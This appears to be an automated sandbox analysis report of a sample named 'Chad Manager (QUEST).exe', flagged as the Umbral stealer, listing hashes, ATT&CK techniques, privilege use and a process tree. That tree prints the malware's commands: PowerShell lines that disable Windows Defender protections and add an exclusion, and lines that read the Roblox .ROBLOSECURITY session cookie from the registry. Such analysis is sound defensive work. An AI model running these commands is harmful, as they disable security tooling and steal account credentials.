umbral | d57da5841f0117edb2cd41d92c03de6385bbe69563abbcd902b8e09a111824e8

Resubmissions

16/11/2023, 14:41

231116-r2taxacd86 10

Analysis

max time kernel
118s
max time network
121s
platform
windows7_x64
resource
win7-20231020-en
resource tags

arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
submitted
16/11/2023, 14:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Chad Manager (QUEST).exe
Size

362KB
MD5

cca5bab38fe75d3683b7355f1084007a
SHA1

c2f0c7ffd1cf73c0f2f4a6c881150e1cb78288c0
SHA256

d57da5841f0117edb2cd41d92c03de6385bbe69563abbcd902b8e09a111824e8
SHA512

afe550e0007e76483c84cf3d9c0341240f45d715bbb192fa04aa0ab55e7baf8cb2a0332267869a123c846cd1389ed060dfaec7ea8d40b6110f234965436b7fd9
SSDEEP

6144:PcyHIGadsUS0O3ulKjb8eNHOJZCDv4zMYAU:Pc+IG9/jR

Score

10^/10

umbral spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/memory/1668-0-0x00000000009B0000-0x0000000000A10000-memory.dmp	family_umbral
behavioral1/memory/1668-2-0x000000001B220000-0x000000001B2A0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1984	wmic.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2864	powershell.exe
2904	powershell.exe
2232	powershell.exe
2680	powershell.exe
784	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1668	Chad Manager (QUEST).exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	2232	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeIncreaseQuotaPrivilege	1560	wmic.exe
Token: SeSecurityPrivilege	1560	wmic.exe
Token: SeTakeOwnershipPrivilege	1560	wmic.exe
Token: SeLoadDriverPrivilege	1560	wmic.exe
Token: SeSystemProfilePrivilege	1560	wmic.exe
Token: SeSystemtimePrivilege	1560	wmic.exe
Token: SeProfSingleProcessPrivilege	1560	wmic.exe
Token: SeIncBasePriorityPrivilege	1560	wmic.exe
Token: SeCreatePagefilePrivilege	1560	wmic.exe
Token: SeBackupPrivilege	1560	wmic.exe
Token: SeRestorePrivilege	1560	wmic.exe
Token: SeShutdownPrivilege	1560	wmic.exe
Token: SeDebugPrivilege	1560	wmic.exe
Token: SeSystemEnvironmentPrivilege	1560	wmic.exe
Token: SeRemoteShutdownPrivilege	1560	wmic.exe
Token: SeUndockPrivilege	1560	wmic.exe
Token: SeManageVolumePrivilege	1560	wmic.exe
Token: 33	1560	wmic.exe
Token: 34	1560	wmic.exe
Token: 35	1560	wmic.exe
Token: SeIncreaseQuotaPrivilege	1560	wmic.exe
Token: SeSecurityPrivilege	1560	wmic.exe
Token: SeTakeOwnershipPrivilege	1560	wmic.exe
Token: SeLoadDriverPrivilege	1560	wmic.exe
Token: SeSystemProfilePrivilege	1560	wmic.exe
Token: SeSystemtimePrivilege	1560	wmic.exe
Token: SeProfSingleProcessPrivilege	1560	wmic.exe
Token: SeIncBasePriorityPrivilege	1560	wmic.exe
Token: SeCreatePagefilePrivilege	1560	wmic.exe
Token: SeBackupPrivilege	1560	wmic.exe
Token: SeRestorePrivilege	1560	wmic.exe
Token: SeShutdownPrivilege	1560	wmic.exe
Token: SeDebugPrivilege	1560	wmic.exe
Token: SeSystemEnvironmentPrivilege	1560	wmic.exe
Token: SeRemoteShutdownPrivilege	1560	wmic.exe
Token: SeUndockPrivilege	1560	wmic.exe
Token: SeManageVolumePrivilege	1560	wmic.exe
Token: 33	1560	wmic.exe
Token: 34	1560	wmic.exe
Token: 35	1560	wmic.exe
Token: SeIncreaseQuotaPrivilege	268	wmic.exe
Token: SeSecurityPrivilege	268	wmic.exe
Token: SeTakeOwnershipPrivilege	268	wmic.exe
Token: SeLoadDriverPrivilege	268	wmic.exe
Token: SeSystemProfilePrivilege	268	wmic.exe
Token: SeSystemtimePrivilege	268	wmic.exe
Token: SeProfSingleProcessPrivilege	268	wmic.exe
Token: SeIncBasePriorityPrivilege	268	wmic.exe
Token: SeCreatePagefilePrivilege	268	wmic.exe
Token: SeBackupPrivilege	268	wmic.exe
Token: SeRestorePrivilege	268	wmic.exe
Token: SeShutdownPrivilege	268	wmic.exe
Token: SeDebugPrivilege	268	wmic.exe
Token: SeSystemEnvironmentPrivilege	268	wmic.exe
Token: SeRemoteShutdownPrivilege	268	wmic.exe
Token: SeUndockPrivilege	268	wmic.exe
Token: SeManageVolumePrivilege	268	wmic.exe
Token: 33	268	wmic.exe
Token: 34	268	wmic.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 1668 wrote to memory of 2864	1668	Chad Manager (QUEST).exe	28
PID 1668 wrote to memory of 2864	1668	Chad Manager (QUEST).exe	28
PID 1668 wrote to memory of 2864	1668	Chad Manager (QUEST).exe	28
PID 1668 wrote to memory of 2904	1668	Chad Manager (QUEST).exe	31
PID 1668 wrote to memory of 2904	1668	Chad Manager (QUEST).exe	31
PID 1668 wrote to memory of 2904	1668	Chad Manager (QUEST).exe	31
PID 1668 wrote to memory of 2232	1668	Chad Manager (QUEST).exe	32
PID 1668 wrote to memory of 2232	1668	Chad Manager (QUEST).exe	32
PID 1668 wrote to memory of 2232	1668	Chad Manager (QUEST).exe	32
PID 1668 wrote to memory of 2680	1668	Chad Manager (QUEST).exe	34
PID 1668 wrote to memory of 2680	1668	Chad Manager (QUEST).exe	34
PID 1668 wrote to memory of 2680	1668	Chad Manager (QUEST).exe	34
PID 1668 wrote to memory of 1560	1668	Chad Manager (QUEST).exe	36
PID 1668 wrote to memory of 1560	1668	Chad Manager (QUEST).exe	36
PID 1668 wrote to memory of 1560	1668	Chad Manager (QUEST).exe	36
PID 1668 wrote to memory of 268	1668	Chad Manager (QUEST).exe	39
PID 1668 wrote to memory of 268	1668	Chad Manager (QUEST).exe	39
PID 1668 wrote to memory of 268	1668	Chad Manager (QUEST).exe	39
PID 1668 wrote to memory of 2832	1668	Chad Manager (QUEST).exe	41
PID 1668 wrote to memory of 2832	1668	Chad Manager (QUEST).exe	41
PID 1668 wrote to memory of 2832	1668	Chad Manager (QUEST).exe	41
PID 1668 wrote to memory of 784	1668	Chad Manager (QUEST).exe	43
PID 1668 wrote to memory of 784	1668	Chad Manager (QUEST).exe	43
PID 1668 wrote to memory of 784	1668	Chad Manager (QUEST).exe	43
PID 1668 wrote to memory of 1984	1668	Chad Manager (QUEST).exe	45
PID 1668 wrote to memory of 1984	1668	Chad Manager (QUEST).exe	45
PID 1668 wrote to memory of 1984	1668	Chad Manager (QUEST).exe	45

C:\Users\Admin\AppData\Local\Temp\Chad Manager (QUEST).exe
"C:\Users\Admin\AppData\Local\Temp\Chad Manager (QUEST).exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Chad Manager (QUEST).exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2232
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2680
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1560
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:268
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:2832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:784
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:1984

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\53LJKW0F6I29M43W1VGS.temp

Filesize
7KB

MD5
87e71b71e5fc1a32aa84f2660d9c0fbd

SHA1
bce141d432eaa3686ee0d07bf989b637db3b8db1

SHA256
6b44d726ce430eee15787fa53b55fe90c945f61d9f11ceb74f46c8397a4cbcb0

SHA512
05d295ef06e6d9f4a8d0a17e67dd96229072c4f022314d55b14ba76162c25362b89c2530243c1d16aad34a1e61e0c41cf810184d0661d4e4b38802c55febe672

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
87e71b71e5fc1a32aa84f2660d9c0fbd

SHA1
bce141d432eaa3686ee0d07bf989b637db3b8db1

SHA256
6b44d726ce430eee15787fa53b55fe90c945f61d9f11ceb74f46c8397a4cbcb0

SHA512
05d295ef06e6d9f4a8d0a17e67dd96229072c4f022314d55b14ba76162c25362b89c2530243c1d16aad34a1e61e0c41cf810184d0661d4e4b38802c55febe672

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
87e71b71e5fc1a32aa84f2660d9c0fbd

SHA1
bce141d432eaa3686ee0d07bf989b637db3b8db1

SHA256
6b44d726ce430eee15787fa53b55fe90c945f61d9f11ceb74f46c8397a4cbcb0

SHA512
05d295ef06e6d9f4a8d0a17e67dd96229072c4f022314d55b14ba76162c25362b89c2530243c1d16aad34a1e61e0c41cf810184d0661d4e4b38802c55febe672

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
87e71b71e5fc1a32aa84f2660d9c0fbd

SHA1
bce141d432eaa3686ee0d07bf989b637db3b8db1

SHA256
6b44d726ce430eee15787fa53b55fe90c945f61d9f11ceb74f46c8397a4cbcb0

SHA512
05d295ef06e6d9f4a8d0a17e67dd96229072c4f022314d55b14ba76162c25362b89c2530243c1d16aad34a1e61e0c41cf810184d0661d4e4b38802c55febe672

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
87e71b71e5fc1a32aa84f2660d9c0fbd

SHA1
bce141d432eaa3686ee0d07bf989b637db3b8db1

SHA256
6b44d726ce430eee15787fa53b55fe90c945f61d9f11ceb74f46c8397a4cbcb0

SHA512
05d295ef06e6d9f4a8d0a17e67dd96229072c4f022314d55b14ba76162c25362b89c2530243c1d16aad34a1e61e0c41cf810184d0661d4e4b38802c55febe672

Download Submit
memory/784-69-0x000007FEED710000-0x000007FEEE0AD000-memory.dmp

Filesize
9.6MB

Download
memory/784-68-0x000000001B190000-0x000000001B472000-memory.dmp

Filesize
2.9MB

Download
memory/784-71-0x000007FEED710000-0x000007FEEE0AD000-memory.dmp

Filesize
9.6MB

Download
memory/784-70-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/784-73-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/784-74-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/784-75-0x000007FEED710000-0x000007FEEE0AD000-memory.dmp

Filesize
9.6MB

Download
memory/784-72-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/1668-78-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp

Filesize
9.9MB

Download
memory/1668-59-0x000000001B220000-0x000000001B2A0000-memory.dmp

Filesize
512KB

Download
memory/1668-2-0x000000001B220000-0x000000001B2A0000-memory.dmp

Filesize
512KB

Download
memory/1668-47-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp

Filesize
9.9MB

Download
memory/1668-0-0x00000000009B0000-0x0000000000A10000-memory.dmp

Filesize
384KB

Download
memory/1668-1-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp

Filesize
9.9MB

Download
memory/2232-42-0x000007FEED710000-0x000007FEEE0AD000-memory.dmp

Filesize
9.6MB

Download
memory/2232-45-0x0000000002510000-0x0000000002590000-memory.dmp

Filesize
512KB

Download
memory/2232-49-0x000007FEED710000-0x000007FEEE0AD000-memory.dmp

Filesize
9.6MB

Download
memory/2232-48-0x0000000002510000-0x0000000002590000-memory.dmp

Filesize
512KB

Download
memory/2232-46-0x0000000002510000-0x0000000002590000-memory.dmp

Filesize
512KB

Download
memory/2232-43-0x0000000002510000-0x0000000002590000-memory.dmp

Filesize
512KB

Download
memory/2232-44-0x000007FEED710000-0x000007FEEE0AD000-memory.dmp

Filesize
9.6MB

Download
memory/2680-57-0x0000000002450000-0x00000000024D0000-memory.dmp

Filesize
512KB

Download
memory/2680-60-0x0000000002450000-0x00000000024D0000-memory.dmp

Filesize
512KB

Download
memory/2680-61-0x000007FEECD70000-0x000007FEED70D000-memory.dmp

Filesize
9.6MB

Download
memory/2680-58-0x000007FEECD70000-0x000007FEED70D000-memory.dmp

Filesize
9.6MB

Download
memory/2680-56-0x0000000002450000-0x00000000024D0000-memory.dmp

Filesize
512KB

Download
memory/2680-55-0x000007FEECD70000-0x000007FEED70D000-memory.dmp

Filesize
9.6MB

Download
memory/2864-14-0x000007FEED710000-0x000007FEEE0AD000-memory.dmp

Filesize
9.6MB

Download
memory/2864-7-0x000000001B200000-0x000000001B4E2000-memory.dmp

Filesize
2.9MB

Download
memory/2864-8-0x0000000002040000-0x0000000002048000-memory.dmp

Filesize
32KB

Download
memory/2864-9-0x000007FEED710000-0x000007FEEE0AD000-memory.dmp

Filesize
9.6MB

Download
memory/2864-10-0x0000000002590000-0x0000000002610000-memory.dmp

Filesize
512KB

Download
memory/2864-11-0x000007FEED710000-0x000007FEEE0AD000-memory.dmp

Filesize
9.6MB

Download
memory/2864-12-0x0000000002590000-0x0000000002610000-memory.dmp

Filesize
512KB

Download
memory/2864-13-0x0000000002590000-0x0000000002610000-memory.dmp

Filesize
512KB

Download
memory/2904-22-0x000007FEECD70000-0x000007FEED70D000-memory.dmp

Filesize
9.6MB

Download
memory/2904-20-0x000000001B1C0000-0x000000001B4A2000-memory.dmp

Filesize
2.9MB

Download
memory/2904-23-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2904-21-0x0000000002550000-0x0000000002558000-memory.dmp

Filesize
32KB

Download
memory/2904-25-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2904-24-0x000007FEECD70000-0x000007FEED70D000-memory.dmp

Filesize
9.6MB

Download
memory/2904-26-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2904-28-0x000007FEECD70000-0x000007FEED70D000-memory.dmp

Filesize
9.6MB

Download
memory/2904-27-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download